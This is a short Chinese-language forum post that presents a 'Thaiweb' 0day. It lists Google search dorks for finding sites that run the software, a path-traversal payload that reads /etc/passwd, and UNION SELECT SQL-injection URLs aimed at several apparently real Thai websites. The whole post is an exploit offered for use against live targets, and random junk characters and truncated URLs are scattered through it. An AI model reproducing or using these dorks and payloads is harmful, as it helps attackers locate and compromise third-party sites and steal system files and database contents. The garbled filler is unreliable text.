Thaiweb远程文件sql注入漏洞0day

admin

Google之:

intext:powered by Thaiweb
. I2 Q9 D$ w0 J" d
inurl:index.php?page=board.php



利用点1:http://www.xfack.com/index.php?p ... ../../../etc/passwd
7 v) e  n" m7 ]# o0 V3 O

4 g1 y7 O, f$ w, l# ~
利用点2:http://www.xfack.com/index.php?page=boardque.php&bod_id=4'
9 C# g2 h2 H$ s! e+ S
1 W6 E# L+ K  [) [& }/ C7 o' v  p
0 c2 H1 D6 J7 z$ K3 {
http://www.keytasin.com//index.p ... d=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,316--
4 C6 g- s9 h% c" v
http://www.autopartnerthailand.c ... d=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,316--

http://gift.in.th/index.php?page ... d=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,316--